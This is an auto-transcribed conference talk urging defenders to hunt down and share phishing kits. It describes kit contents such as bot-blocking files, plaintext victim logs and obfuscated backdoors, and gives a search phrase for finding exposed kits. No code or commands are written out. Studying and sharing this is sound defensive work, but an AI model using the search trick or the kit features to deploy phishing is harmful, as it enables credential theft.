Hunting Phish Kits - Josh Rickard

our next speaker is mr josh rickard a very good friend of mine coming out from columbia still a swim lane right yup yup still doing [ __ ] at swimlane he is yet another smart gentleman that is here to talk to us today so without any further ado take it away sir the best cyber terrorist i know josh round up applause

so first of all i wanted to say you know huge shout out to all our sponsors let's give them a hand report without them i know that you know this conference and many others are you know not possible especially during the pandemic and i'll try to hold the mic i'm horrible at it but uh thank them so all right let's get started today we're going to talk about hunting fish kits so we're gonna go into some technical detail but not a ton but just fair one it's more of a what the hell we need to actually be doing now instead of waiting and trying to patch and band-aid fix this problem so again my name is uh josh rickard i

you can follow me on twitter at ms administrator it stands for microsoft ms administrator not miss administrator hmm uh my background kind of ranges right um i did you know help desk for a few years or a year uh did it system support as well as you know system administration you can hear me okay right okay um and then pivoted because i love windows internals and and how the windows operating system worked so i pivoted into uh become a security analyst did that for a few years and then went into digital forensics and incident response i did that for a while really the overarching theme for my career has been to automate anything that i can

whether that's turning on my lights to incident response whatever it is and i release a lot of open source tools along the way and in fact that is me in the unicorn head so why me why should you listen to me about fish kids well i fought fishing at a fairly large scale for a long time when people didn't really give a [ __ ] you know this was back in you know 2013 14 15 those years where fishing was there but no one really cared as much i did create an open source tool to allow users to actually report phishing emails i did this without a funny story i was out at lunch one day i think of chipotle

with a buddy and i was pissed that day because we had a huge phishing attack and people were not reporting an official email correctly so i would have to email them and say please for the original as an attachment blah blah blah and i was like man it would be awesome if they could just you know there's some automation around this or or whatnot and he was like yeah it'd be awesome if they're just a button that they could click and that's all they had to do so i went back to lunch and two weeks later i created a button to do that um it's still being used today but uh i released it open source and then got

offered to work at fish me at the time with copens and uh basically was their technical product manager and took their install base from with their button and their variants from one million to about 18 million when i left global installs and then i also released during that time also a bunch of other automated phishing response tools uh whether that's traversing exchange or graph api or whatever it is around phishing i kind of released it so all right so the structure of today's talk we're really going to talk about how we're all the same all right we we've all been victims of fishing in some capacity and we're all defenders at heart also we're completely on our own

no one's going to solve this problem but us and then we'll just talk about the conclusion so imagine we are all living in an apartment complex each one of us actually has an apartment in this building we're all the same in that regards yes we may have a little bit of differences between you know locks on our doors to um how the ship inside but we're basically the exact same we have those four walls we we have maybe a roof maybe we have you know a kitchen a bedroom whatever but we're all in these individual depart apartments and we try to protect them as much as we can right that's kind of the goal because fishing

is the number one vector we've seen lately for attackers to get inside they'll stow credentials they'll traverse um they'll be sending ransomware whatever it is we all kind of are impacted by fishing in general so imagine we're out and we take a vacation from our apartment and we go fishing or we go hunting or whatever you want to do maybe you just lie on a beach whatever it is we take times away but we're we think that our organization is secure or our apartments are secure but in reality we're all victims in some aspect someone may come into our apartment they may steal valuables that we have credentials or they may even just steal you know data whatever it is

or they may just steal our baby who knows all right i love these icons so hopefully you get the joke it's amazing watch we're probably being perpetrated by tj6 here right some guy in a hoodie a face mask uh and likely we're all kind of facing that same threat it's different threats it's different people in some cases but they're ultimately the same right we try to protect as much as possible whether we build the fancy locks we put facial recognition on our doors we put deadbolts whatever it is we try to protect our building and usually in the realm of fishing this is going to be like your spam filters your um your appliances that you put in the front

whether that's your training or whatever it is we actually try to defend and we're all probably doing the same thing different tools different processes but roughly at a high level the same process and here is just a high-level example of a typical organization we will have let's say some training for a user to report phishing emails and what they do is they identify hey that we need to uh report this message so they do that and they pull it into like a centralized mailbox of some sort where we as security people will either have some automation or manual will extract details about that phishing email whether that's the attachments the the urls the headers whatever it is

and we may look that up in threat intelligence who here does this process just that yeah no well at that point we've made a determination whether it's malicious or not and we blocked it maybe on a firewall or on our proxies or whatever tools kind of as a defense mechanism then we kind of take some response and in this example it's exchange it could be gmail it could be whatever but we remove that message maybe from a user's mailbox especially a large campaign you could do it individually i think this is great and we need to continue doing this but in addition and i'm hoping that some people do this we actually try to train our users to

not click on [ __ ] and you should have shown my other shirt it says stop clicking on [ __ ] but we try to train them to to not do this as much as possible and this on top of all the other [ __ ] that that that we just talked about where we're enabling them to report messages uh we're blocking we're looking at threat intelligence we should continue to do all of that but we're inundated right by next-gen and military grade and all these fancy tools that are keep throwing of us yes they're going to help in the moment but they're always going to be behind the curve no matter what you know they're only going to look for

active defense and active techniques that are being used i think that we need to take this approach continue to do our normal processes as they are but actually fight back increase uh our ability to actually um identify these actors and stop them where they're at so imagine we get phished right we we're all again we've all been victim of victims of it and we want to be we want to try to defend our home as much as possible [Music] let's take another example what if uh we're all out fishing each each one of us uh f-i-s-i-n-g and we all fish and we're trying to catch this one mystical pound you know bass or whatever and if we actually

go out maybe i go out on a tuesday in the afternoon someone else goes out on thursday whatever we're trying to all catch this this one fish and you know we can do that but it's going to take us forever to do so but if we actually talked and communicated between us we would actually have a much better chance of catching that one fish than us trying to accomplish this all by ourselves so this is the typical fish that you would see right it's branded you know this is a paypal fish kit but you know there's other ones there's four different banks different tools microsoft office office 365 whatever it is these are the typical kits that you

would see and i want to extract and actually explain what a general fish kit is before we continue so in my words i guess a fish kit is a deployable web application it's a set of tools that basically enable an attacker to go in and deploy a web app in literally the easiest way possible so they package all this up and it dot zip and the attacker will get it and then they'll upload it to a compromise web server and they'll actually just extract it they'll just extract that zip and they're off to the races they're done they may have to do some configuring we'll talk about that but for the most part it's just an easy

package uh web app that they can just deploy and extract and they're on their way so in these kits there's a lot of different attributes and a lot of different things that are that help us kind of detect these kids as well as understand just how they operate so here you can see there's typically an image folder and they do this because hey we want to not talk back to paypal.com we don't want to grab their images because hey they're going to know that we're doing this and why they are re-referencing their their code their data so they'll embed a lot of these images in after they've copied it's pretty good indicator right do you

see an html relative links to a local path or images like this and it's not paypal.com it's pretty suspicious they'll also have like an htaccess file anybody here familiar with hd access all right so hd access is really pretty much what you see um it basically allows um whoever's using that web application to deny or allow certain access to certain parts uh of or of that website and one thing with this they'll actually continue to add and populate this list with new scanners new bots whatever that have actually tried to scan their website they'll just add them to the list add their subnet whatever so they can just stop them from doing it they'll also have a robots.txt

and this is interesting because you have the user agent and they're saying okay all of these user agents are allowed in this in this example but we want to disallow everyone from those directories on that website so you can't access those folders so if you try to view or or um traverse to that directory you'd be disallowed same below you can do uh specific files and all that but uh funny enough they have not figured out that they should block the actual fish kit itself so when they upload these dot zips they uh they just leave the bombing quick and dirty and they don't disallow access to it which is a gold mine for us as defenders

this is a little hard to see sorry about that uh antibots.php so funny enough a lot of these websites web apps kits are all written in php i'm guessing because of easy deployment or just lack of knowledge i don't know but they use php which is fine but it's kind of an out of date you know language but what they have here and i'll try to explain is that at the top uh they actually have an array of different names like googlebot yahoo whatever that are scanning their website that they want to block now also down here they have um band ip and it's a list of ips and subnets that basically if you try to request

they use this on top of that hd access file to say 404 not found and then they echo out hello [ __ ] i [ __ ] love you try bypass me next time bb i don't know it's the weirdest thing ever but that's what they do so using uh the antibodies.php if you actually when did like a google search and you did in title colon in quotes indexed of and just search that you'll find tons but if you add a file or just a quoted string of anti-bots.php you'll find it even more and they're all open they're all been indexed not all of them of course but but many of them have and so if you just want to

see some and play around you'll you'll find it that way another thing that they do on certain kids this is not so for paypal um trying to steal monetary value basically um they'll actually have a built-in credit card validation for like emx and discover or whatever type of credit cards that you have out there and they just have a built-in validator and it is instead of using some external source to do that validation they just have a little php code that doesn't just kind of interest and take how's the pandemic great [Music] one really cool piece though is logs they're so nice so friendly so in these kits they have logs they have a logging mechanism across

a lot of their code and funny enough when they upload that dot zip they've had to do some testing right like you have to test to make sure it looks like paypal and it looks like whatever and so they've already enabled this logging and they just zip everything up funny enough in this example they left their own client ips for all their testing with their test usernames and all that stuff because they capture all that information so this in this case is really easy but on a live site the code is already there it's logging and it's actually logging anybody that entered their credentials or values out in a plain text text file that they

don't block that we can access pretty awesome

and if you're really really lucky you get all the wears you get all the the malware the exes the dlls here is a huge list of different ps uh powershell scripts that they're using to exploit but you also get their payloads as well on these servers which is really cool because now you have all this cool malware that you can detect so you have to look for these things but you're able to just grab them most of the time just from grabbing that kid alone lastly man this is a i wish that was a little darker sorry um if you cannot tell this is all ascii art it's amazing uh in these in these kits uh in the code

base they'll actually include the marks like what gang what what what group they're a part of what version it is who created it uh and there would be like um this is the paypal from mr hallem that's his name and then though this one is really hard to tell but um it says zestioti uh work hard dream big is our slogan and it gives you a link to their facebook group so there's a lot of really cool information in here that we can use from a defensive perspective um and um well just overall tracking these individuals all right there at our fingertips [Music] all right so let's go back to our analogy there's a lot of well there's a lot of

other things inside of these kits but the typical that you're going to find is php code some some actual web servers will actually hold tons of different fish or efficient websites on them so that's even a better gold mine but uh they're all pretty much the same and let's say we're we're gone and we get back to tour we went fishing we get back to our apartment uh and we realized hey that someone just ran off with with all of our [ __ ] what do we do we try to defend right we try to defend as much as possible i mean we go so far into buying technology and buying all these tools to prevent it from happening again

but what we need to do is actually fight back and stop and there's a fine line between fighting back uh borders and and tracking these individuals but we're waiting just for the next event is our tools up to date do we have defenses do we block ips do we block these uh indicators or ttps at our border whatever it is we all try to defend and that's our natural way of looking at the world but we're drowning purely drowning thousands and thousands alerts i worked a few years ago where i was the only one on on call and we got hit by 300 different phishing websites and phishing emails at one time how do you protect against that

when you're a small team you're a small organization just inundated nowadays you know you have a little bit more staff but you're still overwhelmed by the volume of alerts from your edr from your antivirus from other tools within your environment that it's you don't even know where to start right the one thing that we need to understand is that i don't care what vendor you are i work for a vendor but um i don't care which one you're at no one none of them are gonna actually save you period you're not gonna go you know let's say you get robbed and you go in and you call the police and they're like oh yeah yeah dude you should have installed

locks better locks should have protected your windows should have put a security camera buy this thing yes that helps for future events but we're not solving the problem we're not actually fixing the damn problem so we take our typical you know processes that that i talked about earlier where you know user reports that phishing email they uh we extract data we block things we remove things i think we should do this and still continue to do this but we need to take a step further in our initial response we need to actually go and hunt for these fish kids and get them and track them what i mean is that when you get that efficient email you get that url you get

that attachment whatever go and figure out and i'll show you a little bit of how but go and and figure out who the hell is attacking why are they attacking what do they want what are they trying to get understand that concept helps you prevent uh a from yourself being attacked continually but also all of your other apartment mates in that in that complex we have to fight back in general i i don't know how else to to say that we need to take a proactive approach instead of just constantly waiting for the next phishing email waiting for that next um you know tool to come out that's going to help us you know with ai and

neural networks or whatever the hell you're going to call it we have to actually [ __ ] back i mean don't go stabbing anybody but right like we have to actually um perform some sort of understanding of who is attacking us and why and this comes with like a great uh example with those logs that we were talking about the logging gives us the ability to actually understand who may have attacked us who felt victim in our organization if you go grab that log from that that kid or from that site now you know anybody in your organization that may have felt victim plus anybody else in any other organization may have a that you can go notified

right off the go it's all there for us to grab

again we're on our own you think there's no vendors that i know of that that actually uh do this if you know of them please let me know but we need to actually track these individuals and understand their ttps their ioc so we can not only protect us but protect everyone else as well because we're sitting on a gold line of data that we need to use we need to utilize to actually track these individuals down or these groups take down infrastructure and understand the entire landscape of how it's actually operating instead of just waiting for the next fish to come and hoping that we have enough defensive control in place that we can prevent it

but we all know that's not true

again man i should have done something sorry about that guys um and yes iocs are not new so there's a fine line we want to get to ttps tactics techniques and procedures around these uh attacks but iocs are still relevant in my opinion the relevant for active defense what i mean is live active attacks going on right now yes infrastructure can be redeployed fairly easy i think i heard a stat that uh every 18 hours a new phishing website can just be spun up and and or on average 18 hours is the time that efficient website is actually alive so one day less than one day but we can still use those active um iocs especially to track these

individuals over time they give us some really awesome information right we have those the ascii art gives us typically the fish get names the actors what version they're building on where to get it where can you buy it from the logs again those active logs that are archived inside of that um inside of that kit when they're doing their testing but also afterwards when it's live and they're live logging anybody that fell victim to that that credit credential also like what hosting providers do they typically use you can look that information up what ips are they sitting on do they typically uh use those ips do you see a trend also who is information like who

registered it track those back maybe they registered 100 other websites that day whatever it is we can actually track all of this information and use it to our our our defense and be more proactive in that response instead of just constantly just waiting we can actually take that information all right we know they just registered these 100 domains let's block them all period we're not going to get this in and they also have email addresses so inside of these kits they usually again deploy them extract them and they'll have built-in places for the users to actually enter their email addresses so there's a level of hierarchy here that we need to understand these kits are made by one individual or

one group sold to some other fisher and then they use it against us it's typically there's an entire pipeline development i use those terms in very loose loose manners but there's an entire development team uh that are that are testing these that are that are using these uh and then they're being sold for like thirty forty dollars a piece hundred dollars for office 365 one um you know oh you want an exploit let's add in 100 whatever it is they're just selling a hand over fist and they're doing this at scale it's actually if you really want to know there's a really cool article that came out yesterday [Music] two days ago from microsoft security

about how they took down um one of these big manufacturers of these kits um and they explained it all in detail if you want to know the link i can i can give it to you but i didn't want to change my slides at the last minute but you might see something like this inside of that codebase inside of that php see this huge strain of [ __ ] it's base 64 encoded and then it coded with rot 13 and then gzipped and then encoded again with world 13. so these manufacturers of these kits are building you know these kits and placing this in there then the user that they sold it to [Music] just look at this and they're like

i don't know what the hell this is i'm just going to leave it and go on because they're not typically super technical because they're these kits they're buying them because they're easy to set up easy to get and i can just get some money and go when you actually decode all of those you'll see this and what this means is that uh it's mostly on the right but what the scammers are doing is the uh scammers that are building this kit will actually embed certain email addresses that they want all the responses from that kit to go to and you'll see do the scott seo and longnumber.com that is the payment processor they actually have payments that uh any

of these kits that we fault that that a victim falls uh well that a user falls victim to will uh send it send all those credentials or credit card information to the people that deployed that kit but at the back the same time the kit maker backdoored their own cover so i like to sum this up as the scammers are literally scamming the scammers and they don't know it so they're getting double so they're getting paid for the kid now they're getting all the credentials too and they could process it way faster because they have infrastructure we all have our house right we're all being attacked by these type of attacks almost on a daily basis

yeah i mean paypal is a little you know specific or less specific i guess where you may have something branded to your organization um whatever but they're still using the line right office 365 is probably going to be the best example i'm sure almost all of you have seen that or google drive or a google doc or whatever it is you've seen those kind of infrastructure in that kit but it may have your logo instead of just a generic one it's still a kid we all have our house and we all need to do all those things to protect our infrastructure we have to and i don't think that we should stop anytime soon

but we need to go at the extraction point and start gathering that information it's going to help you i promise we're going to get and we're going to get that information we're going to get those kits and we're going to understand who was actually attacking us why who felt victim to us or to this maybe we could help others as well after time but we all need to actually protect uh our self right first we have to if you're not doing this without the the fish kit part if you're not doing that you need to now and if you want help i will literally email talk to you or whatever help you show you tools that you can

automate this [ __ ] whatever just loving it but what the ultimate goal is we need to protect everyone else too if i'm in let's say oil or finance or whatever kind of vertical within my organizational type there's others that are probably seeing the exact same thing or they'll be the next victim down the line i began i worked in higher ed and we would see this all the time we would see uh we're getting hit by let's say a payroll scam or whatever it is and we'll see it maybe a year before another university does because they're just going down the list and they're just hopping and hopping on so by grabbing this information and sharing

it out we can help someone else and we'll be able to get that big fish instead of just constantly battling and constantly trying to defend as and keeping all that [ __ ] to ourselves we shouldn't once you have done that kind of basic uh response and you want to start you know you even have uh protected and others in your even area like even in the kansas city or the midwest or or whatever it doesn't have to be global but but you need to actually share you can actually go a step further and be more proactive these are couple of some of the sources that i use uh certificate transparency logs if you're not familiar

these are every single certificate that is being generated renewed used is basically on this large stream of data that you can access anybody can they even have a website that make it super super easy you can also just search domain who is you can do paceman but it's a dumpster fire so be careful uh and then like black holes or blacklists like use that information to go and actively find people that are trying to attack you because it's super it's pretty straightforward once you know the basics of what you're looking for and now you can actually have a ton more defensive coverage and threat intelligence in your life one of the good starting places that i

like to bring up is a twitter of people are out there sharing all the kits and all the phishing websites that they're coming across but they don't work probably in huge email infrastructure like like me i do not have access to thousands or even millions of emails where i'm at because we're just not that big where i was yeah millions we could get we could search we could do things we could we saw all the different types of phishing emails out there but what they what you can do is just go to twitter and search uh either a hashtag or a stream of open dir fish kit fishing kit and you'll just sort by latest and

you'll just see a stream for days you'll see something like this where they'll actually have you know a whole bunch of hashtags and a whole bunch of you know links they have c2 infrastructure uh they actually show you when i said earlier um the google search with index of if you're not familiar index of means it looks like this or you can actually traverse the file system basically and this is called an open dir or an open directory means they didn't hide it which if it's badly configured they they just don't but then you can see like links and and other links and just keep sharing and sharing and training to help you do this

i created a tool uh that you can use i made it i think as dumb as possible it's python but it's called tweet fish and you have to clone the repository and install it it explains all that but you have you can actually save the configuration of your twitter api and you have to register that and i explain that on the site but once you do that literally the next time you use it you just say tweet fish tweet and then paste the url that you found and it'll automatically tweet for you in a fancy format and like hashtags and all that [ __ ] for you automatically it's just super simple just like next

time you get that url you're pasting it in the virustotal or whatever just paste it into that tool done that's how you get it so i hope it helps because we have to start sharing and we have to start talking if you can't do any of it you don't want to send it to me i'll do it i'll automate the entire damn thing there is a low it's loafius but with a zero at protonmail.com um send it to me i'll take it i'll automate the entire thing i do this for fun i don't know why i hate myself but i do there's also tons of other tools out there too there is fishing catcher fish kid hunter

just go out to github and just search fish like p-h-i-x-h you'll see thousands of repositories of different tools around there's tons of amounts of just sort by like the most stars it's probably the better one right use them they help you actually find these kids you enter into a url and they'll go out and search that entire website for you you can put it through a proxy put it on another server whatever super a lot of them are super super simple to use so use them to your advantage they're all free and they'll all they can do is help and share once you have that you know share it again to twitter share it to your colleagues create a distribution

list with like all your friends and and whatever um again share it with me i don't care we just have to share this information because if not we're not we're not solving the problem we're defensively protecting ourselves but we're not actually going after the individuals doing it we're just waiting to the next waiting for the next and just so on and so forth i also want to talk about another tool that i created i'll have a link i think at the end but it's still a work in progress it was working i broke it and yeah but uh if you really want it let me know and i'll fix it but uh you could probably use a lot of the

code if you're familiar with programming at all but it's docker and docker compose uh it sets up basically we pull all the information from all of these sources actively on a scheduled basis and it will actually put it through a queue that then the trawler service will go and download whatever the hell they can period then we'll save all that and now we have a database just full of all these kits binaries logs everything about it works pretty well when it worked again you can probably reuse a lot of the code but it's there it's called troll you can tell the names of [ __ ] i love making things so uh sounder guts spotted

controller you know fishing terms all right so the biggest thing that we need to understand as security professionals is that we're not we're not winning the battle yes we are maybe defensively better than we were let's say a year ago but we're not solving the actual problem we have different blocks we have different security measures in place but we're and we're all trying to defend our little slice but that only goes so far you're doing work that someone else is doing that someone else is doing that someone else is doing and you're all just doing the same damn work so you need to actually talk collaborate and and join forces to actually make a difference in this arena

yeah you know you may we're all going to be victims and we're all going to get attacked might be attacked by a bear who knows but we actually have to be more proactive with our response mechanisms when it comes to fishing and these kits have tons of data that we can just use at any point no one's gonna save us superman is not gonna come and protect us some vendor is not gonna come and protect us but we have to actually again fight back as as much as possible because we are totally honored and talk we have to talk share share data just with distribution list group twitter wherever it is get this [ __ ] out of there because

you're going to help someone else down the line yes it's another step hopefully some of the tools will actually help you know help you with that if you're like i need something that would help in this situation let me know i love coding i love python and it's pretty easy for me so just please let me know and i'll build it may take a while but i'll build it all right so here's my info uh again my name is josh rickard um you follow me on twitter at ms administrator uh send me fish right there if you're if you can if you want uh and tweet fish and then that link for troll which is under uh where i work swim lane

swimlane is a security orchestration automation response company but um yeah we released a bunch of open source tools like pi attack software pi uws tons of other things and troll was one of them so thank you all